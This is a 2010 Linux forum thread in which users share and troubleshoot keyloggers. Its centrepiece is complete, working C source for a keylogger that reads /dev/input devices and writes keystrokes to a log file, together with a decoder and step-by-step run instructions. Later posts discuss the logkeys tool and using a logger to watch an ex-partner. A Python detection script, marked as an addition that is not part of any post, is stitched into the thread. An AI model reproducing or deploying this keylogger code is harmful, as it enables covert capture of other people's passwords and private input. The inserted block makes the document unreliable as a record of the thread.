01-05-2010, 03:01 AM   #46
H_TeXMeX_H
LQ Guru

Registered: Oct 2005
Location: $RANDOM
Distribution: slackware64
Posts: 12,928
Blog Entries: 2

Rep: Reputation: 1301

Well, it looks like other attempts have been posted in this thread, so ok, here it is, my awesome keylogger !

Actually I wanted a good keylogger, but couldn't find any, so I decided to write one, and so I did, with some code from another project.

Benefits of this keylogger:
Works with USB keyboards ! (tested with 2 different keyboards)
Uses no noticeable CPU time ! (this cannot be said for any other Linux keylogger that I have tried, and was a must for me, most of them use 100% CPU time)
Is minimalistic (3 includes, 2 ints, 1 file, 0 libs, 21 lines of effective code) ! (I like minimalistic)

There are two parts to the keylogger, the keylogger, and the decoder.

NOTE: Most code was taken from:
ventriloctrl-0.4
http://public.callutheran.edu/~abark...trl-0.4.tar.gz
findkey.c

so probably the license is their license (really I only changed a few things to make this into a keylogger):
Code:
Copyright (c) 2006 Purkka Productions
                         Toni Spets <toni.spets@gmail.com>
                         Markus Lindqvist <markus.lindqvist@gmail.com>

Permission to use, copy, modify, and distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.

THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

Here's the keylogger:

Code:
#include <linux/input.h>
#include <fcntl.h>
#include <stdio.h>

int main(int argc, char **argv)
{
    if (argc < 2)
    {
        printf("usage: %s <device>\n", argv[0]);
        return 1;
    }

    // !init
    struct input_event ev;

    // init
    int fd = open(argv[1], O_RDONLY);
    FILE *infile = fopen("/var/log/keylog", "a");
    unsigned int i = 0;

    while (read(fd, &ev, sizeof(struct input_event)))
    {
        if (ev.type == 1 && ev.value != 0)
        {
            fprintf(infile, "%i\n", ev.code);
            i++;
            if (i == 5)
            {
                i = 0;
                fflush(infile);
            }
        }
    }
    return 0;
}

To run it you first run:

Code:
bash-3.1$ cat /proc/bus/input/devices 

I: Bus=0003 Vendor=045e Product=00b0 Version=0111
N: Name="Microsoft Microsoft® Digital Media Pro Keyboard"
P: Phys=usb-0000:00:1a.0-1/input0
S: Sysfs=/devices/pci0000:00/0000:00:1a.0/usb3/3-1/3-1:1.0/input/input9
U: Uniq=
H: Handlers=kbd event9 
B: EV=120013
B: KEY=1000000000007 ff800000000007ff febeffdff3cfffff fffffffffffffffe
B: MSC=10
B: LED=107

I: Bus=0003 Vendor=045e Product=00b0 Version=0111
N: Name="Microsoft Microsoft® Digital Media Pro Keyboard"
P: Phys=usb-0000:00:1a.0-1/input1
S: Sysfs=/devices/pci0000:00/0000:00:1a.0/usb3/3-1/3-1:1.1/input/input10
U: Uniq=
H: Handlers=kbd event10 js0 
B: EV=10001f
B: KEY=837fff002c3027 bf00444400000000 c00000000000001 10f848a27c007 ffff7bfad941dfff febeffdfffefffff fffffffffffffffe
B: REL=40
B: ABS=ffffff01000701ff
B: MSC=10

Although there are two entries for my keyboard here, the one for event9 works, so you would run the program as follows:

Code:
keylogger /dev/input/event9

and it will log everything typed on the keyboard as numbers to /var/log/keylog. Now, there is a catch in that it writes to this file every 5 keystrokes (average length of English word), but you can change that if you want, it has to do this because the user may shut down the computer (or the computer may crash) and we wouldn't know when. Of course, you can redesign it to write to the file at shutdown.

Now, it writes only numbers so you need a program that interprets the log. So you would write something like:

This I release under GPLv2, because I wrote it alone.

The decoder:

Code:
#include <stdio.h>
#include <stdlib.h>

int main (void)
{
    FILE *infile;
    FILE *outfile;
    int num;

    // open infile for reading text
    infile = fopen("keylog", "r");
    if ( infile == NULL ) { fputs ("ERROR: failed to open input file 'keylog' !",stderr); exit (1); }

    // open outfile for writing text
    outfile = fopen("keylogout", "w");
    if ( outfile == NULL ) { fputs ("ERROR: failed to open output file 'keylogout' !",stderr); exit (1); }

    // parse infile
    while (fscanf(infile, "%d", &num) != EOF)
    {
        switch (num)
        {
            case 2: fprintf(outfile, "1"); break;
            case 3: fprintf(outfile, "2"); break;
            case 4: fprintf(outfile, "3"); break;
            case 5: fprintf(outfile, "4"); break;
            case 6: fprintf(outfile, "5"); break;
            case 7: fprintf(outfile, "6"); break;
            case 8: fprintf(outfile, "7"); break;
            case 9: fprintf(outfile, "8"); break;
            case 10: fprintf(outfile, "9"); break;
            case 11: fprintf(outfile, "0"); break;
            case 12: fprintf(outfile, "["); break;
            case 13: fprintf(outfile, "]"); break;
            case 14: fprintf(outfile, "B"); break;
            case 15: fprintf(outfile, " "); break;
            case 16: fprintf(outfile, "'"); break;
            case 17: fprintf(outfile, ","); break;
            case 18: fprintf(outfile, "."); break;
            case 19: fprintf(outfile, "p"); break;
            case 20: fprintf(outfile, "y"); break;
            case 21: fprintf(outfile, "f"); break;
            case 22: fprintf(outfile, "g"); break;
            case 23: fprintf(outfile, "c"); break;
            case 24: fprintf(outfile, "r"); break;
            case 25: fprintf(outfile, "l"); break;
            case 26: fprintf(outfile, "/"); break;
            case 27: fprintf(outfile, "="); break;
            case 43: fprintf(outfile, "|"); break;
            case 58: fprintf(outfile, "L"); break;
            case 30: fprintf(outfile, "a"); break;
            case 31: fprintf(outfile, "o"); break;
            case 32: fprintf(outfile, "e"); break;
            case 33: fprintf(outfile, "u"); break;
            case 34: fprintf(outfile, "i"); break;
            case 35: fprintf(outfile, "d"); break;
            case 36: fprintf(outfile, "h"); break;
            case 37: fprintf(outfile, "t"); break;
            case 38: fprintf(outfile, "n"); break;
            case 39: fprintf(outfile, "s"); break;
            case 40: fprintf(outfile, "-"); break;
            case 42: fprintf(outfile, "S"); break;
            case 44: fprintf(outfile, ";"); break;
            case 45: fprintf(outfile, "q"); break;
            case 46: fprintf(outfile, "j"); break;
            case 47: fprintf(outfile, "k"); break;
            case 48: fprintf(outfile, "x"); break;
            case 49: fprintf(outfile, "b"); break;
            case 50: fprintf(outfile, "m"); break;
            case 51: fprintf(outfile, "w"); break;
            case 52: fprintf(outfile, "v"); break;
            case 53: fprintf(outfile, "z"); break;
            case 54: fprintf(outfile, "S"); break;
            case 29: fprintf(outfile, "C"); break;
            case 57: fprintf(outfile, " "); break;
            case 28: fprintf(outfile, "\n"); break;
            case 69: fprintf(outfile, "N"); break;
            case 98: fprintf(outfile, "/"); break;
            case 55: fprintf(outfile, "*"); break;
            case 74: fprintf(outfile, "-"); break;
            case 71: fprintf(outfile, "7"); break;
            case 72: fprintf(outfile, "8"); break;
            case 73: fprintf(outfile, "9"); break;
            case 78: fprintf(outfile, "+"); break;
            case 75: fprintf(outfile, "4"); break;
            case 76: fprintf(outfile, "5"); break;
            case 77: fprintf(outfile, "6"); break;
            case 79: fprintf(outfile, "1"); break;
            case 80: fprintf(outfile, "2"); break;
            case 81: fprintf(outfile, "3"); break;
            case 82: fprintf(outfile, "0"); break;
            case 83: fprintf(outfile, "."); break;
            case 96: fprintf(outfile, "\n"); break;
            case 105: fprintf(outfile, "<"); break;
            case 106: fprintf(outfile, ">"); break;
            case 103: fprintf(outfile, "^"); break;
            case 108: fprintf(outfile, "!"); break;
        }
    }

    // close files
    fclose (infile);
    fclose (outfile);

    return 0;
}

This parses it properly ONLY for the dvorak keyboard layout, you'll have to change the numbers for qwerty or whatever layout you use. It also reads the log file from the current directory, if you want you can change keylog to /var/log/keylog to read from there directly.

That's it. Anyway, don't use this for spying on people. Keyloggers are legal, but spying on people is not, unless of course you work for the gubmint ...

Last edited by H_TeXMeX_H; 02-09-2012 at 03:23 AM.
 
01-05-2010, 11:40 AM   #47
kernc
LQ Newbie
 
Registered: Jan 2010
Distribution: Xubuntu
Posts: 13

Rep: Reputation: 0
Quote:
Originally Posted by roscogruen View Post
is this "logkey" from a trusted repo? what is the repo? i don't find logkey in the ones i use.

things have changed: logkeys is new. :P
it isn't in repositories yet as it is still in (public) alpha stage. you can, however, download logkeys source and follow the instructions in the README file. the usual `./configure && make && make install` should work, i believe.

logkeys is trusted, the functionality of emailing logs/POSTing to remote server is in the works, the source is available to be examined.

note, none of these keyloggers work with USB yet. why not is really beyond my level of understanding.
regardless of the next few posts, logkeys keylogger works with USB keyboards as well.

Quote:
Originally Posted by H_TeXMeX_H
Well, I recently wrote a rather nice keylogger

well, our implementations rely on the same event interface, only mine does steps 1, 2 and 3 automatically (and comparing the length of both sources i agree it definitely should).

as you appear knowledgeable enough, sir, may i kindly ask that you try out my creation, especially with your dvorak-style keyboard? you may need to --export-keymap first and fix it in places, but that is expected, i guess.

could you please report back? thanks a ton!

Last edited by kernc; 03-03-2010 at 01:06 AM. Reason: USB keyboards info update
 
01-08-2010, 09:14 AM   #48
H_TeXMeX_H

You say that none of the keyloggers work with USB yet, well, I have a USB keyboard and I tried my keylogger on another computer with a different USB keyboard and it works fine on both. So I'd say mine works with USB.

EDIT:

I have tried logkeys as you suggested, but it really doesn't seem to work with my keyboard. It just doesn't output any log file no matter what. Maybe it really doesn't support USB as you said.

Last edited by H_TeXMeX_H; 01-08-2010 at 09:24 AM.
 
01-09-2010, 01:22 AM   #49
kernc

Really??
Neither with --device option and correct device path (e.g. /dev/input/event9)?

logkeys also reads input event device and if yours works, do you have any idea why mine doesn't?

EDIT: issue was since solved.

Last edited by kernc; 03-03-2010 at 01:09 AM. Reason: update
 
01-09-2010, 05:04 AM   #50
H_TeXMeX_H

Yeah I ran:

Code:
touch test.log
logkeys -s -o test.log -d /dev/input/event9

No output at all. Not with event10 either.

I do notice that you are using a similar method to the one used by ventriloctrl and thus by my keylogger here. So here is my theory on why it does not work for you. While I was writing this keylogger I wanted to make a program like the one you wrote that not only caught these key press events (numbers) but also dynamically converted them to letters and outputted them directly to a file. I realized quickly that this was not going to work; my keylogger behaved exactly like yours when I tried this, it wouldn't output anything. I have a feeling that this is because while reading the input event, these events appear and disappear too quickly to be processed by the program. Maybe this can be solved by some type of buffer ? Not sure. But either way, every time I tried to do too much processing before reading the next key event it would no longer work. So what I thought would be a good solution is to just dump all the key press events to a file and convert these later to letters, so this is what I did.
 
01-09-2010, 10:26 AM   #51
gilk
LQ Newbie
 
Registered: Apr 2009
Posts: 4

Rep: Reputation: 0
well - use a camera :-)

Quote:
Originally Posted by cpbills View Post
this might be something i'd be interested in working on...

if i get anything done, roclok, it'll be a perl script to attach to whatever logfile evdev logs to...

i can see the uses for this, in a non-cracker facility...

for example, my ex isn't quite trustworthy, and i still let her in my apartment, etc...

it'd be interesting to see if she was snooping around on my computers while i'm away...

use a camera.... she might be snooping not only in your computer...
 
01-10-2010, 07:51 AM   #52
kernc

Quote:
Originally Posted by H_TeXMeX_H View Post
EDIT:

I have tried logkeys as you suggested, but it really doesn't seem to work with my keyboard. It just doesn't output any log file no matter what.

Wait... WHAT?
It doesn't even produce a logfile with the 'Logging started...' header line?
In that case, can you please confirm that the following code works for you?
Code:
#include <sys/file.h>
#include <sys/stat.h>   // umask()
#include <cstdio>
#include <cstdlib>
#include <cerrno>
#include <unistd.h>

int main(int argc, char *argv[]) {
  umask(0177);  // files created from here on are readable/writable by owner only
  stdout = freopen(argv[1], "a", stdout);  // redirect stdout to the file given as argv[1]
  if (stdout == NULL) {
    fprintf(stderr, "Error opening file '%s'", argv[1]);
    return EXIT_FAILURE;
  }
  setgid(65534); setuid(65534); // become 'nobody'
  printf("successfully printed to file %s\n", argv[1]);
}

I'd really hate it to bang my head over errors that are not.
 
01-10-2010, 07:57 AM   #53
H_TeXMeX_H

It says "successfully printed to file (null)".
 
01-10-2010, 09:08 AM   #54
kernc

In order to not pointlessly spam this thread any longer I have sent you an email.
Thanks for your patience, H_TeXMeX_H!

EDIT: there was a bug present on 64bit architectures. it is now fixed thanks to the community.

Last edited by kernc; 03-03-2010 at 01:01 AM. Reason: update
 
03-02-2010, 09:04 PM   #55
krattai
LQ Newbie
 
Registered: Mar 2010
Posts: 3

Rep: Reputation: 0
I love the paranoia that happens every time someone mentions they want to capture keystrokes. ;-)

Aside from "to see if I can", there are certainly very valid reasons to do so. I believe someone earlier posted that they wanted to capture keystrokes and disallow those keys from touching a media player unless they were acceptable. That's the premiss that I'm working from.

Rather than logging or writing keystrokes to file (that's irrelevant in this context), the software will simply observe the keyboard and wait for certain keys to be pressed. When the keys are pressed, the software will then perform certain actions in preparation for the keystrokes to occur again. Like the media player example, the software needs to sniff the keyboard buffer and not grab and drop keystrokes since the software can't run in the foreground and the keystrokes are important to the applications that are in the foreground so the keystrokes must remain in the buffer.

I've tried modifying uberkey and it was working great in tests, until I moved it to its final platform which only has USB keyboard capability. I'm very happy to have found this thread, although it wasn't easy.

I'll try to use the two competing products above "as is", but have a sneaky suspicion I'll have to use some combination of the two or three (including uberkey). If either of you, texmex and kernc are interested and watching the thread, I'd be happy to discuss what I'm trying to accomplish and maybe we can share some code and ideas.

In the meantime, I'll report any results and observations that I get through the process as I can.
 
03-03-2010, 01:22 AM   #56
kernc

Quote:
Originally Posted by krattai View Post
... the software will simply observe the keyboard and wait for certain keys to be pressed ... not grab and drop keystrokes since the software can't run in the foreground ...

using event subsystem and parsing keypresses from /dev/input/eventX will do just that, provided your X doesn't exclusively grab your keyboard device first. if logkeys works on your final platform, this method is I believe the easiest that will work for you.
 
03-04-2010, 02:02 AM   #57
krattai

Quote:
Originally Posted by kernc View Post
using event subsystem and parsing keypresses from /dev/input/eventX will do just that, provided your X doesn't exclusively grab your keyboard device first. if logkeys works on your final platform, this method is I believe the easiest that will work for you.

It was quite interesting to see both the onboard keyboard of the laptop I'm testing on and the USB keyboard both throwing characters to stdout, yet having different buffers.

The appliance that this will be running on has a USB keyboard controller on it and I'm hoping that each appliance will be using the same /dev/input/eventX so that a simple drive mirror will allow the key capture to work, hardcoded, on each appliance.

Otherwise, do you or anyone know of a function that would grab the event id of a keyboard? A second keyboard would be placed on the system when maintenance is happening. This second keyboard wouldn't have to provide the same functionality, although it would be interesting and maybe even nice to be given that option.
 
03-04-2010, 11:30 PM   #58
kernc

Quote:
Originally Posted by krattai View Post
do you or anyone know of a function that would grab the event id of a keyboard?

logkeys extracts the id from /proc/bus/input/devices with a simple shell script using grep.
this method should work, assuming listed devices are ordered by id.

if you find a better method, please share.

Last edited by kernc; 03-04-2010 at 11:31 PM.
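
Added example, not part of any post in this thread and not logkeys code: every logger discussed here reads /dev/input/eventX, so a defender can pick out keyboard nodes from /proc/bus/input/devices by their `kbd` handler (instead of relying on device order) and list the processes holding them open. The function names, the `EXPECTED_READERS` allowlist and the trimmed sample listing are assumptions of this example.

```python
import os
import re

# Trimmed from the /proc/bus/input/devices listing quoted in post #46.
SAMPLE_DEVICES = """\
I: Bus=0003 Vendor=045e Product=00b0 Version=0111
N: Name="Microsoft Microsoft Digital Media Pro Keyboard"
H: Handlers=kbd event9
B: EV=120013

I: Bus=0003 Vendor=045e Product=00b0 Version=0111
N: Name="Microsoft Microsoft Digital Media Pro Keyboard"
H: Handlers=kbd event10 js0
B: EV=10001f
"""

# Assumption: processes expected to read keyboards on this host; tune per system.
EXPECTED_READERS = {"Xorg", "systemd-logind"}


def keyboard_nodes(devices_text):
    """Return /dev/input paths of every device whose Handlers line lists 'kbd'."""
    nodes = []
    for block in re.split(r"\n\s*\n", devices_text.strip()):
        match = re.search(r"^H: Handlers=(.*)$", block, re.MULTILINE)
        handlers = match.group(1).split() if match else []
        if "kbd" in handlers:
            nodes += ["/dev/input/" + h for h in handlers if h.startswith("event")]
    return nodes


def open_input_readers(proc_root="/proc"):
    """Map pid -> (command name, sorted event devices it holds open)."""
    readers = {}
    for pid in filter(str.isdigit, os.listdir(proc_root)):
        fd_dir = os.path.join(proc_root, pid, "fd")
        try:
            links = [os.readlink(os.path.join(fd_dir, fd)) for fd in os.listdir(fd_dir)]
            with open(os.path.join(proc_root, pid, "comm")) as fh:
                comm = fh.read().strip()
        except OSError:
            continue  # process exited, or we lack permission (run as root)
        devices = sorted({t for t in links if t.startswith("/dev/input/event")})
        if devices:
            readers[int(pid)] = (comm, devices)
    return readers


def unexpected_keyboard_readers(readers, kbd_nodes, expected=EXPECTED_READERS):
    """Return readers that hold a keyboard node open and are not on the allowlist."""
    return {
        pid: (comm, devs)
        for pid, (comm, devs) in readers.items()
        if comm not in expected and set(devs) & set(kbd_nodes)
    }


if __name__ == "__main__":
    try:
        with open("/proc/bus/input/devices") as fh:
            text = fh.read()
    except OSError:
        text = SAMPLE_DEVICES  # fall back to the embedded listing
    hits = unexpected_keyboard_readers(open_input_readers(), keyboard_nodes(text))
    for pid, (comm, devs) in sorted(hits.items()):
        print(f"pid {pid} ({comm}) is reading {', '.join(devs)}")
```

A process can set its own `comm` value, so treat the allowlist as triage and confirm a hit against `/proc/<pid>/exe` before trusting or dismissing it.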
 
03-07-2010, 08:06 PM   #59
fakie_flip
Senior Member
 
Registered: Feb 2005
Location: San Antonio, Texas
Distribution: Gentoo Hardened using OpenRC not Systemd
Posts: 1,495

Rep: Reputation: 85
xspy can display all keystrokes to stdout of a certain X display with backtrack 4 though it may be patched against in other distros.

Last edited by fakie_flip; 03-07-2010 at 08:20 PM.
 
03-08-2010, 12:13 AM   #60
roscogruen
LQ Newbie
 
Registered: Jul 2009
Posts: 22

Rep: Reputation: 15
agree

Quote:
Originally Posted by krattai View Post
I love the paranoia that happens every time someone mentions they want to capture keystrokes. ;-)

i agree. the first ten times i asked on forums and chat groups about a keylogger, i met a volley of "why do you need one?" or "get rid of the person making the keystrokes," etc. Getting rid of the problem, rather than fixing it is the usual response i get.

i will try the keylogger kernc suggests, again.
 
  

